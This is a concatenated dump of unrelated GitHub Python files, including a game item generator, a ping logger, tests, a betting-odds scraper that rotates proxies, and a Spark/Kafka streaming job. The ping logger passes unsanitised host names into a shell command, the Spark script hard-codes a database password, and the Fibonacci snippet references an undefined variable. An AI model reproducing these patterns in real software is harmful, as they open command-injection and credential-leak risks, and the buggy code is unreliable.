titleTwo = titlesTwoList[titlesTwoSelection]\n titleTwo = titleTwo.rstrip(\"\\n\")\n titleTwo = titleTwo.title()\n titlesTwoFO.close()\n return titleTwo\n\n def getTalismanName(self):\n talismanFO = open(\"typeclasses/itemator/word_lists/talismans.txt\")\n talismanList = list(talismanFO)\n selection = random.randint(0, len(talismanList) - 1)\n talisman = talismanList[selection]\n talisman = talisman.rstrip(\"\\n\")\n talismanFO.close()\n return talisman\n\n def getSciFiAdjective(self):\n SciFiAdjectiveFO = open(\"typeclasses/itemator/word_lists/scifiwords.txt\")\n SciFiAdjectiveList = list(SciFiAdjectiveFO)\n selection = random.randint(0, len(SciFiAdjectiveList) - 1)\n SciFiAdjective = SciFiAdjectiveList[selection]\n SciFiAdjective = SciFiAdjective.rstrip(\"\\n\")\n SciFiAdjectiveFO.close()\n return SciFiAdjective\n\n def addAorAn(self, word):\n try:\n if word[-1] != \"s\" and word[0] == \"a\" or word[0] == \"e\" or word[0] == \"i\" or word[0] == \"o\" or word[0] == \"u\":\n word = \"An \" + word\n elif word[-1] != \"s\":\n word = \"A \" + word\n except IndexError:\n word = \"One \" + word\n return word\n\n def generateItem(self):\n \n itemType = random.randint(0, 7)\n if itemType <= 2:\n self.item_proto = self.generateTalisman()\n elif itemType == 3:\n self.item_proto = self.generateArt()\n elif itemType == 4:\n self.item_proto = self.generateSciFiBook()\n elif itemType == 5:\n self.item_proto = self.generatePoem()\n else:\n self.item_proto = self.generateGarment()\n\n return self.item_proto\n\n\n \n def generateGarment(self):\n clothesFO = open(\"typeclasses/itemator/word_lists/clothes.txt\")\n clothesList = list(clothesFO)\n color = self.getColor()\n clothesSelection = random.randint(0, len(clothesList) - 1)\n clothingItem = clothesList[clothesSelection]\n clothingItem = clothingItem.rstrip(\"\\n\")\n self.item_name = clothingItem\n clothingDescription = self.addAorAn(color) + \" \" + clothingItem\n self.item_description = clothingDescription\n clothesFO.close()\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"evennia.contrib.clothing.Clothing\",\n \"desc\": self.item_description,\n }\n return self.item_proto\n\n def getTextColor(self):\n r = random.randint(0, 5)\n g = random.randint(0, 5)\n b = random.randint(0, 5)\n textcolor = \"|\" + str(r) + str(g) + str(b)\n return textcolor\n\n def generateTalisman(self):\n color = self.getColor()\n substance = self.getSubstance()\n adjective = self.getAdjective()\n name = self.getTalismanName()\n self.item_name = name\n anAdjective = self.addAorAn(adjective)\n self.item_description = anAdjective + \" \" + \\\n name + \" made of \" + color + \" \" + substance + \".\"\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n }\n return self.item_proto\n\n def generateArt(self):\n roll = random.randint(0, 20)\n color = self.getColor()\n substance = self.getSubstance()\n adjective = self.getAdjective()\n artwork = self.getArtwork()\n title = self.getTitle()\n titleTwo = self.getTitleTwo()\n skill = self.getSkill()\n key = title + \" \" + titleTwo\n textcolor = self.getTextColor()\n verb = self.getVerb()\n theme = self.getTheme()\n anAdjective = self.addAorAn(adjective)\n self.item_key = key\n if roll <= 10:\n self.item_description = textcolor + \"'\" + key + \"'|n\" + \": \\n\" + anAdjective + \" piece of \" + artwork + \" created from \" + color + \" \" + substance + \". \" + \"It's a masterful work of \" + skill + \" as it \" + verb + \" \" + theme + \".\"\n self.item_proto = {\n \"key\": self.item_key,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n \"artwork\": \"true\",\n }\n if roll >= 19:\n self.item_description = \"|500\" + \"'\" + key + \"'|n\" + \": \\n |401 An unspeakable anathema |n \" + artwork + \" forged in \" + color + \" \" + substance + \". \" + \"It embodies profane \" + skill + \" as it \" + verb + \" \" + theme + \".\"\n self.item_proto = {\n \"key\": self.item_key,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n \"artwork\": \"true\",\n \"cursed\": \"true\",\n }\n else:\n self.item_description = textcolor + \"'\" + key + \"'|n\" + \": \\n\" + anAdjective + \" example of \" + artwork + \" rendered in \" + color + \" \" + substance + \". \" + title + \" \" + titleTwo + \" displays considerable \" + skill + \" as it \" + verb + \" \" + theme + \".\"\n self.item_proto = {\n \"key\": self.item_key,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n \"artwork\": \"true\",\n }\n return self.item_proto\n\n def generateSciFiBook(self):\n adjective = self.getSciFiAdjective()\n book_name = self.getTalismanName()\n color = self.getColor()\n bookCorpusFO = open(\"typeclasses/itemator/word_lists/scifi_book_corpus.txt\")\n text = bookCorpusFO.read()\n text_model = markovify.NewlineText(text)\n textcolor = self.getTextColor()\n self.item_name = color + \" book\"\n self.bookDescription = \"A book of science fiction. You can |555read|n it if you like.\"\n book_text = \"The \" + adjective + \" \" + book_name \n book_text = \"\\n\" + textcolor + book_text.title() + \"|n\" + \"\\n\\n\"\n for i in range(60):\n try:\n book_text += text_model.make_sentence(tries=100) + \"\\n\"\n except TypeError:\n book_text += \"ROCKETS! ROCKETS! ROCKETS!\"\n bookCorpusFO.close()\n self.readable_text = book_text\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"typeclasses.objects.Readable\",\n \"desc\": self.bookDescription,\n \"readable_text\": self.readable_text,\n }\n return self.item_proto\n\n def generatePoem(self):\n poem_name =\"A poem\"\n poetryCorpusFO = open(\n \"typeclasses/itemator/word_lists/poetry_corpus.txt\")\n text = poetryCorpusFO.read()\n text_model = markovify.NewlineText(text)\n text_model = text_model.compile()\n thing = self.getTitleTwo()\n textcolor = self.getTextColor()\n self.poemDescription = \"A chapbook of poetry. You can |555read|n it if you like.\"\n poem_name = text_model.make_short_sentence(30)\n try:\n poem_name = poem_name.title()\n except:\n poem_name = poem_name\n poem_text = \"\\n\" + textcolor + poem_name + \"|n\\n\"\n for i in range(5):\n roll = random.randint(0, 5)\n try:\n if roll == 0:\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += \"\\t\\t\" + text_model.make_short_sentence(120) + \"\\n\"\n elif roll == 2:\n poem_text += \"\\t\" + poem_name +\" \"+ text_model.make_sentence(tries=100) + \"\\n\\n\"\n elif roll == 3:\n poem_text += \"\\t\\t\" + text_model.make_short_sentence(80) + \", the \" + thing + \".\\n\"\n elif roll == 4:\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n else:\n poem_text += \"\\t\\t\" + text_model.make_short_sentence(120) + \"\\n\"\n except TypeError:\n poem_text += \"\\n\"\n roll = random.randint(0, 3)\n if roll ==1:\n poem_text += \"\\n\\t\\t\"\n poem_text += textcolor + text_model.make_sentence(tries=100) + \" \" + poem_name +\".|n\"\n poetryCorpusFO.close()\n self.item_name = poem_name\n self.readable_text = poem_text\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"typeclasses.objects.Readable\",\n \"desc\": self.poemDescription,\n \"readable_text\": self.readable_text,\n }\n return self.item_proto\n","repo_name":"wysiwyggins/Grotto","sub_path":"pre-django_scripts/itemator.py","file_name":"itemator.py","file_ext":"py","file_size_in_byte":11793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"29270542291","text":"import os\nimport time\nimport os.path\n\n# Read hosts\nhosts = [x.replace(\"\\n\", \"\") for x in open(\"hosts.txt\", \"r\").readlines()]\n\ndef ping(host):\n # unix-like only\n res = os.popen(f\"ping {host} -c 1\").read()\n # parse response\n latency = res\\\n .split(\"\\n\")[-2]\\\n .split(\"= \")[1]\\\n .split(\" ms\")[0]\\\n .split(\"/\")[0]\n \n return (int(time.time()), float(latency))\n\nif not os.path.exists(\"out\"): os.makedirs(\"out\")\n\nfor host in hosts:\n res = ping(host)\n filepath = f\"out/{host}.csv\"\n exists = os.path.isfile(filepath)\n # Create file\n outfile = open(filepath, \"a\")\n # Check if output file exists\n if not exists:\n outfile.write(\"\\\"time\\\",\\\"ping\\\"\")\n outfile.write(f\"\\n{res[0]},{res[1]}\")\n ","repo_name":"CAG2Mark/server-ping-logger","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17692480894","text":"import sys\nimport os\nimport pytest\n\nsys.path.append(os.path.realpath(os.path.dirname(__file__) + \"/../..\"))\nsys.path.append(os.path.realpath(os.path.dirname(__file__) + \"/../../lib/intelligence/\"))\n\nfrom lib.gui_helper import GUIHelper\nfrom src.game import Game\nfrom src.bot import Bot\nfrom src.dice import Dice\nfrom intelligence_low import IntelligenceLow\nfrom intelligence_high import IntelligenceHigh\n\n\nclass TestBot:\n @pytest.mark.parametrize(\"bot\", [\n pytest.lazy_fixture('bot_low'),\n pytest.lazy_fixture('bot_high'),\n ])\n def test_get_ghelper(self, bot):\n assert(isinstance(bot.get_ghelper(), GUIHelper))\n\n @pytest.mark.parametrize(\"execution_number\", range(5))\n def test_roll_again_iq_low(self, bot_low, execution_number):\n decision = bot_low.roll_again(0, 0, 0, 0)\n assert type(decision) is bool\n\n @pytest.mark.parametrize(\n \"test_param\",\n [\n [0, 0, 0, 0, True], # beginning of the game\n [87, 91, 3, 3, True], # bot last roll\n [98, 81, 3, 3, True], # player last roll\n [37, 29, 18, 3, False], # optimal turn score\n [87, 79, 10, 5, True], # max turn roll score\n [37, 29, 26, 7, False], # finish turn\n [77, 87, 18, 3, False], # winning score\n ],\n )\n def test_roll_again_iq_high(self, bot_high, test_param):\n res = test_param.pop()\n assert bot_high.roll_again(*test_param) == res\n\n @pytest.mark.parametrize(\n \"bot, player_total\",\n [\n (pytest.lazy_fixture(\"bot_low\"), 0),\n (pytest.lazy_fixture(\"bot_high\"), 60),\n (pytest.lazy_fixture(\"bot_high\"), 90),\n (pytest.lazy_fixture(\"bot_high\"), 100),\n (pytest.lazy_fixture(\"bot_high\"), 105),\n ],\n )\n def test_play(self, bot, player_total, capsys):\n bot.play(Dice(), player_total, lambda x: x, 0)\n captured = capsys.readouterr().out # '5\\n2\\n6\\n'\n assert type(captured) is str\n elements = captured.split(\"\\n\")\n assert len(list(filter(lambda i: i not in range(1, 7), elements)))\n\n @pytest.fixture(scope=\"function\")\n def bot_low(self):\n return Bot(\"Computer\", IntelligenceLow(None), GUIHelper())\n\n @pytest.fixture(scope=\"function\")\n def bot_high(self):\n return Bot(\"Computer\", IntelligenceHigh(Game()), GUIHelper())\n","repo_name":"p33t00/py-game","sub_path":"tests/pytests/bot_test.py","file_name":"bot_test.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74910784159","text":"\"\"\"a\n\nRevision ID: 555cab92387a\nRevises: 25979ee1e026\nCreate Date: 2023-07-21 11:11:04.457534\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '555cab92387a'\ndown_revision = '25979ee1e026'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('crypto_accounts', sa.Column('processes', sa.Integer(), nullable=False))\n op.add_column('tickets', sa.Column('dtime', sa.TIMESTAMP(), server_default=sa.text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\"), nullable=False))\n op.add_column('transactions', sa.Column('dtime', sa.TIMESTAMP(), server_default=sa.text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\"), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('transactions', 'dtime')\n op.drop_column('tickets', 'dtime')\n op.drop_column('crypto_accounts', 'processes')\n # ### end Alembic commands ###\n","repo_name":"twopercent051/forex_rus_bot","sub_path":"migrations/versions/555cab92387a_a.py","file_name":"555cab92387a_a.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71015875999","text":"from storeManage.data import Data\nfrom storeManage.extmem import Extmem\nfrom storeManage.algorithm import Algorithm\nextmem = Extmem()\nblkSize = 64\nbufSize = 520\nbuf = extmem.initBuffer(bufSize,blkSize)\nalgorithm = Algorithm()\n\ndef testWriteToDisk():\n blkIndex = buf.getNewBlock()\n addrs = []\n\n for i in range(buf.numAllBlock):\n addr = 'block_%d' %i\n # addr = int(addr)\n addrs.append(hash(addr).to_bytes(8,byteorder='little',signed=True))\n for addr in addrs:\n new_bytearray = bytearray(blkSize)\n data = b'abcdefg'\n new_bytearray[0:len(data)] = data[:]\n buf.insertBlock(new_bytearray,addr)\n _addr = int.from_bytes(addr,byteorder='little',signed=True)\n extmem.writeBlockToDisk(0,_addr,buf)\n print(str(buf))\n\ndef testInitData():\n data = Data()\n data.init_data()\n\ndef testReadFromDisk():\n extmem.readBlockFromDisk(1230600,buf)\n print(str(buf))\n\ndef testRelationSelect():\n # R.A = 40 -> 从 10000 开始存\n addrs = algorithm.relationSelect(algorithm.data.R, 1, 40, 10000)\n print(addrs)\n\ndef testRelationProjection():\n addrs = algorithm.relationProjection(algorithm.data.R, 1, 20000)\n print(addrs)\n\ndef testNestLoopJoin():\n # R.A == S.C\n addrs = algorithm.nest_loop_join(1, 1, 30000)\n print(addrs)\n\ndef testHashJoin():\n # R.A == S.C\n addrs = algorithm.hash_join(1, 1, 40000)\n print(addrs)\n\ndef testSortMergeJoin():\n # R.A == S.C\n addrs = algorithm.sort_merge_join(1, 1, 50000)\n print(addrs)\n\n# testInitData()\n# testWriteToDisk()\n# testReadFromDisk()\n\n# testRelationSelect()\n# testRelationProjection()\ntestNestLoopJoin()\ntestHashJoin()\ntestSortMergeJoin()\n","repo_name":"shuai-f/queryOptimization","sub_path":"storeManage/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12278554730","text":"#finding fibanocci series\ndef fib(n):\n \"Recursive function\"\n if n <= 1:\n return n\n else:\n return(fib(n-1) + fib(n-2))\n\n# take input from the user\nterms = int(input(\"How many terms? \"))\n\n# check if the number of terms is valid\nif nterms <= 0:\n print(\"enter a positive integer\")\nelse:\n print(\"Fibonacci sequence:\")\n for i in range(terms):\n print(fib(i))","repo_name":"ruwaizrazak/learning","sub_path":"python/fibanocci.py","file_name":"fibanocci.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14111286659","text":"import logging\r\nimport time\r\nfrom datetime import datetime\r\nimport json\r\nimport random\r\nimport asyncio\r\nimport aiohttp\r\n\r\nimport nest_asyncio\r\nnest_asyncio.apply()\r\n\r\nlogging.basicConfig(\r\n level=logging.INFO,\r\n format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',\r\n datefmt='%Y-%m-%d:%H:%M:%S'\r\n)\r\n\r\ndate_ = datetime.today().strftime('%Y-%m-%d')\r\nproxy_auth = aiohttp.BasicAuth('', '') # login, password\r\nproxy_token = ''\r\n\r\n\r\nclass Unibet:\r\n\r\n BOOKIE = 'Unibet'\r\n MAIN_URL = 'https://www.unibet.com'\r\n LIVE_URL = '='\r\n EXPAND_MODE = False\r\n USE_PROXY = 0\r\n WORKERS = 500\r\n SPECIALS = 'true'\r\n PRIMARY_ONLY = 'true'\r\n ALLOWED_SPORTS = [\r\n # 'Badminton',\r\n # 'Baseball',\r\n 'Basketball',\r\n # 'Boxing',\r\n # 'E Sports',\r\n 'Football',\r\n # 'Handball',\r\n # 'Hockey',\r\n # 'Rugby Union',\r\n # 'Snooker',\r\n # 'Soccer',\r\n # 'Tennis',\r\n # 'Volleyball'\r\n\r\n ]\r\n\r\n def __init__(self):\r\n self.proxies = asyncio.run(self.get_proxies())\r\n\r\n async def get_proxies(self):\r\n async with aiohttp.ClientSession() as session_:\r\n url = 'https://proxy.webshare.io/api/v2/proxy/list/' \\\r\n '?mode=direct' \\\r\n '&page=1' \\\r\n '&page_size=100,' \\\r\n '&country_code__in=IT,FR,ES'\r\n async with session_.get(\r\n url, headers={\"Authorization\": proxy_token}) as response:\r\n proxies = await response.json()\r\n return proxies.get('results')\r\n\r\n async def bound_live(self, sem, sport):\r\n url = f'https://spectate-web.888sport.com/spectate/sportsbook-req/getUpcomingEvents/{sport.lower()}/today'\r\n url = f'https://www.unibet.com/sportsbook-feeds/views/filter/{sport.lower()}/all/matches' \\\r\n '?includeParticipants=true&useCombined=true'\r\n len_proxy = len(self.proxies)\r\n choice_1 = random.randint(0, len_proxy - 1)\r\n proxy = f\"http://{self.proxies[choice_1]['proxy_address']}:{self.proxies[choice_1]['port']}\"\r\n prematch = []\r\n try:\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(url, proxy_auth=proxy_auth, proxy=proxy) as response:\r\n prematch = await response.json()\r\n except OSError as e:\r\n logging.info(f'{e}')\r\n try:\r\n if len(prematch) == 0:\r\n return\r\n except TypeError:\r\n return\r\n prematches_list = await self.get_matches_list(sem, prematch)\r\n return prematches_list\r\n\r\n async def random_proxy(self):\r\n proxies = [\r\n ]\r\n return random.choice(proxies)\r\n\r\n async def get_matches_list(self, sem, data):\r\n for section in data.get('layout', {}).get('sections'):\r\n if section.get('position') == 'MAIN':\r\n for widget in section.get('widgets'):\r\n if widget.get('widgetType') == \"TOURNAMENT\":\r\n groups = widget.get('matches', {}).get('groups', [])\r\n\r\n matches_list = []\r\n for group in groups:\r\n country = group.get('englishName')\r\n if group.get('subGroups') is None:\r\n continue\r\n for subgroup in group.get('subGroups', []):\r\n league = subgroup.get('englishName')\r\n for event in subgroup.get('events'):\r\n match_id = event.get('event', {}).get('id')\r\n match = event.get('event', {}).get('englishName')\r\n sport = event.get('event', {}).get('sport').lower().capitalize()\r\n kickoff = event.get('event', {}).get('start')\r\n # print(match_id, match, sport, kickoff, league, country)\r\n url = f'https://www.unibet.com/betting/sports/event/{match_id}'\r\n betAttribute = {\r\n 'info': {\r\n 'id': match_id,\r\n 'match': match,\r\n 'bookmaker': self.BOOKIE,\r\n 'league': league,\r\n 'country': country,\r\n # 'match_id': match_id,\r\n 'sport': sport,\r\n 'checking_time': time.ctime(),\r\n 'unix_time': int(time.time()),\r\n 'kickoff': int(datetime.fromisoformat(kickoff.replace('Z', '')).timestamp()) + 10800,\r\n 'url': url\r\n },\r\n }\r\n converted_m_list = []\r\n for bet_offer in event.get('betOffers', []):\r\n if bet_offer.get('suspended') is False:\r\n for bet in bet_offer.get('outcomes', []):\r\n scanner_format_bet = await self.convert_to_scanner_format(bet, bet_offer)\r\n if scanner_format_bet is False:\r\n continue\r\n converted_m_list.append(scanner_format_bet)\r\n betAttribute['converted_markets'] = converted_m_list\r\n matches_list.append(betAttribute)\r\n return matches_list\r\n\r\n async def convert_to_scanner_format(self, bet, whole_bet):\r\n if bet.get('status') == 'SUSPENDED':\r\n return False\r\n if whole_bet.get('criterion').get('englishLabel') == \"Full Time\":\r\n if bet['label'] in ['1', 'X', '2']:\r\n if len(whole_bet.get('outcomes', [])) == 3:\r\n type_name = '1X2'\r\n return await self.return_scanner_format(type_name, f\"{bet['label']}\", bet['odds'] / 1000)\r\n elif whole_bet.get('betOfferType').get('englishName') == \"Match\":\r\n type_name = '12'\r\n if bet.get('type') == 'OT_ONE':\r\n type_ = f\"1\"\r\n elif bet.get('type') == 'OT_TWO':\r\n type_ = f\"2\"\r\n return await self.return_scanner_format(type_name, type_, bet['odds'] / 1000)\r\n elif whole_bet.get('criterion').get('englishLabel') == \"Total Goals\":\r\n type_name = \"Totals\"\r\n line = str(bet.get('line') / 1000)\r\n type_ = bet.get('label', 'n')[:1]\r\n return await self.return_scanner_format(type_name, type_, bet['odds'] / 1000, line)\r\n elif whole_bet.get('criterion').get('englishLabel') in \\\r\n [\"Game Handicap\", \"Handicap\", 'Handicap - Including Overtime']:\r\n type_name = \"Handicap(OT)\"\r\n line = str(bet.get('line') / 1000)\r\n if bet.get('type') == 'OT_ONE':\r\n type_ = f\"H1\"\r\n elif bet.get('type') == 'OT_TWO':\r\n type_ = f\"H2\"\r\n return await self.return_scanner_format(type_name, type_, bet['odds'] / 1000, line)\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n async def return_scanner_format(type_name: str, type_: str, odds: float, line='0.0') -> dict:\r\n scanner_format = {\r\n 'type_name': type_name,\r\n 'type': type_,\r\n 'line': line,\r\n 'odds': odds\r\n }\r\n return scanner_format\r\n\r\n async def get_matches(self):\r\n tasks = []\r\n sem = asyncio.Semaphore(self.WORKERS)\r\n for sport in self.ALLOWED_SPORTS:\r\n try:\r\n task = asyncio.ensure_future(self.bound_live(sem, sport))\r\n tasks.append(task)\r\n except Exception as e:\r\n print(e)\r\n responses = await asyncio.gather(*tasks)\r\n matches = []\r\n for matches_ in responses:\r\n matches += matches_\r\n logging.info(f\"{self.BOOKIE} has {len(matches)} events\")\r\n return matches\r\n\r\n\r\nif __name__ == '__main__':\r\n ps = Unibet()\r\n logging.info(f\"Start Unibet.com scraper...\")\r\n filename = '../cache/Unibet_cache.json'\r\n\r\n while True:\r\n try:\r\n date_ = datetime.today().strftime('%Y-%m-%d')\r\n loopf = asyncio.get_event_loop()\r\n future = asyncio.ensure_future(ps.get_matches())\r\n loopf.run_until_complete(future)\r\n with open(filename, 'w') as f:\r\n json.dump(future.result(), f, indent=4)\r\n sleep_time = 10\r\n logging.info(f\"{sleep_time} seconds sleep.\")\r\n time.sleep(sleep_time)\r\n except Exception as e:\r\n # raise e\r\n logging.error(f\"{e}\")\r\n time.sleep(120)\r\n","repo_name":"DoroninDobro/The_New_Great_Value","sub_path":"bookmakers/unibet_com.py","file_name":"unibet_com.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"7593976180","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 4 19:48:30 2021\r\n\r\n@author: Petr\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\nimport plotly.graph_objects as go\r\nfrom IPython.display import display, Latex\r\n\r\n\r\npotenc = np.loadtxt(\"C:\\\\Users\\\\Petr\\\\Desktop\\\\potenc_prak.txt\",delimiter = \"\\t\",skiprows=1, dtype=float)\r\npotenc1 = potenc[:,0]\r\npotenc2 = potenc[:,1]\r\nfor i in range(len(potenc1)):\r\n potenc1[i] = -potenc1[i]\r\n potenc2[i] = -potenc2[i]\r\nx = []\r\ny = []\r\nfor i in range(1,13):\r\n for j in range(1,13):\r\n x.append(i)\r\n y.append(j)\r\nx = np.array(x)\r\ny = np.array(y)\r\n\r\nx = np.reshape(x,(12,12))\r\ny = np.reshape(y,(12,12))\r\npotenc1 = np.reshape(potenc1,(12,12))\r\npotenc2 = np.reshape(potenc2,(12,12))\r\n\r\n\r\n\r\n\r\n\r\n\r\nfig = go.Figure(data=[go.Surface(z=potenc1, x=x, y=y)])\r\nfig.update_layout(title = \"Potenciál první konfigurace\",scene = dict(\r\n \r\n xaxis_title=\"x\",\r\n yaxis_title=\"y\",\r\n zaxis_title= \"φ\"))\r\n \r\nfig.write_html(\"potenc1.html\")\r\nfig = plt.figure(figsize =(15, 11))\r\nax = plt.axes(projection='3d')\r\nax.set_xlabel('x',size = 20,labelpad=20)\r\nax.set_ylabel('y',size = 20,labelpad=20)\r\nax.set_zlabel(\"$\\\\phi$\",size = 20,labelpad=10)\r\nax.zaxis.set_tick_params(labelsize=18)\r\nax.yaxis.set_tick_params(labelsize=18)\r\nax.xaxis.set_tick_params(labelsize=18)\r\nax.zaxis.set_rotate_label(False) \r\nsurf = ax.plot_surface(x, y, potenc1,edgecolor ='none', cmap='plasma', linewidth=1)\r\ncbar = fig.colorbar(surf,ax=ax, shrink=0.5, aspect=5)\r\ncbar.ax.tick_params(labelsize=18)\r\nplt.savefig(\"potenc1.eps\")\r\nfig2 = go.Figure(data=[go.Surface(z=potenc2, x=x, y=y)])\r\nfig2.update_layout(title = \"Potenciál druhé konfigurace\",scene = dict(\r\n \r\n xaxis_title=\"x\",\r\n yaxis_title=\"y\",\r\n zaxis_title= \"φ\"))\r\n \r\nfig2.write_html(\"potenc2.html\")\r\nfig2 = plt.figure(figsize =(15, 11))\r\nax2 = plt.axes(projection='3d')\r\nax2.set_xlabel('x',size = 20,labelpad=20)\r\nax2.set_ylabel('y',size = 20,labelpad=20)\r\nax2.set_zlabel(\"$\\\\phi$\",size = 20,labelpad=10)\r\nax2.zaxis.set_tick_params(labelsize=18)\r\nax2.yaxis.set_tick_params(labelsize=18)\r\nax2.xaxis.set_tick_params(labelsize=18)\r\nax2.zaxis.set_rotate_label(False) \r\nsurf2 = ax2.plot_surface(x, y, potenc2,edgecolor ='none', cmap='plasma', linewidth=1)\r\ncbar2 = fig2.colorbar(surf2,ax=ax2, shrink=0.5, aspect=5)\r\ncbar2.ax.tick_params(labelsize=18)\r\nplt.savefig(\"potenc2.eps\")","repo_name":"cervep12/python","sub_path":"3Dgraf.py","file_name":"3Dgraf.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40367136487","text":"import os\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nimport time\nimport csv\nimport psycopg2\n#mqtt\nimport paho.mqtt.client as mqtt\nfrom pykafka import KafkaClient\n\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-sql-kafka-0-10_2.12:3.1.1 pyspark-shell'\n\nkafka_topic_name = \"test-topic\"\nkafka_bootstrap_servers = 'localhost:9092'\n#mqtt\nmqttBroker = \"mqtt.eclipseprojects.io\"\nclient = mqtt.Client(\"mqttbridge\")\nclient.connect(mqttBroker)\n\nkafka_client = KafkaClient(hosts='localhost:9092')\nkafka_topic = kafka_client.topics[b'test-topic']\nkafka_producer = kafka_topic.get_sync_producer()\n\nif __name__ == \"__main__\":\n print(\"Welcome!!!\")\n print(\"Stream Data Processing Application Started ...\")\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n spark = SparkSession \\\n .builder \\\n .appName(\"mm\") \\\n .config(\"spark.driver.extraClassPath\", \"/home/gharsallah/Downloads/postgresql-42.3.1.jar\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n\n spark.sparkContext.setLogLevel(\"ERROR\")\n\n # configure the PostgreSQL JDBC driver\n jdbc_url = \"jdbc:postgresql://localhost:5432/pfadata\"\n connection_properties = {\n \"user\": \"sara\",\n \"password\": \"saroura1\",\n \"driver\": \"org.postgresql.Driver\"\n }\n # Connect to PostgreSQL and truncate the tables\n conn = psycopg2.connect(\n host=\"localhost\",\n database=\"pfadata\",\n user=\"sara\",\n password=\"saroura1\"\n )\n cur = conn.cursor()\n cur.execute(\"TRUNCATE TABLE popular_station, popular_bikes, avg_duration, mqtt_msg;\")\n conn.commit()\n cur.close()\n\n\n # Construct a streaming DataFrame that reads from test-topic\n orders_df = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", kafka_bootstrap_servers) \\\n .option(\"subscribe\", kafka_topic_name) \\\n .option(\"startingOffsets\", \"latest\") \\\n .load()\n\n # Define schema for incoming Kafka messages\n orders_schema = \"duration_sec STRING, start_time STRING, end_time STRING, \" \\\n \"start_station_id LONG, start_station_name STRING, start_station_latitude DOUBLE, \" \\\n \"start_station_longitude DOUBLE, end_station_id LONG, end_station_name STRING, \" \\\n \"end_station_latitude DOUBLE, end_station_longitude DOUBLE, bike_id STRING, user_type STRING\"\n\n # Parse incoming messages as JSON and apply the schema\n orders_df1 = orders_df.select(from_json(col(\"value\").cast(\"string\"), orders_schema).alias(\"data\"), \"timestamp\")\n orders_df1 = orders_df1.selectExpr(\"data.*\", \"timestamp\")\n\n\n\n\n # The most popular start and end stations\n popular_stations = orders_df1.groupBy(\"start_station_name\", \"end_station_name\") \\\n .count() \\\n .orderBy(desc(\"count\")) \\\n .limit(10)\n\n # The most frequently rented bikes\n popular_bikes = orders_df1.groupBy(\"bike_id\") \\\n .count() \\\n .orderBy(desc(\"count\")) \\\n .limit(10)\n\n # The average duration of a rental\n avg_duration = orders_df1.select(avg(\"duration_sec\").cast(\"FLOAT\").alias(\"avg_duration_sec\"))\n\n # Write results to PostgreSQL table\n def write_to_postgres_pop_sation(df, epoch_id):\n df.write.jdbc(url=jdbc_url, table=\"popular_station\", mode=\"append\", properties=connection_properties)\n def write_to_postgres_popular_bikes(df, epoch_id):\n df.write.jdbc(url=jdbc_url, table=\"popular_bikes\", mode=\"append\", properties=connection_properties)\n def write_to_postgres_avg_duration(df, epoch_id):\n df.write.jdbc(url=jdbc_url, table=\"avg_duration\", mode=\"append\", properties=connection_properties)\n\n # Start the write stream queries\n popular_stations_write_stream = popular_stations \\\n .writeStream \\\n .trigger(processingTime='2 seconds') \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint1\") \\\n .foreachBatch(write_to_postgres_pop_sation) \\\n .start()\n\n popular_bikes_write_stream = popular_bikes \\\n .writeStream \\\n .trigger(processingTime='2 seconds') \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint2\") \\\n .foreachBatch(write_to_postgres_popular_bikes) \\\n .start()\n avg_duration_write_stream 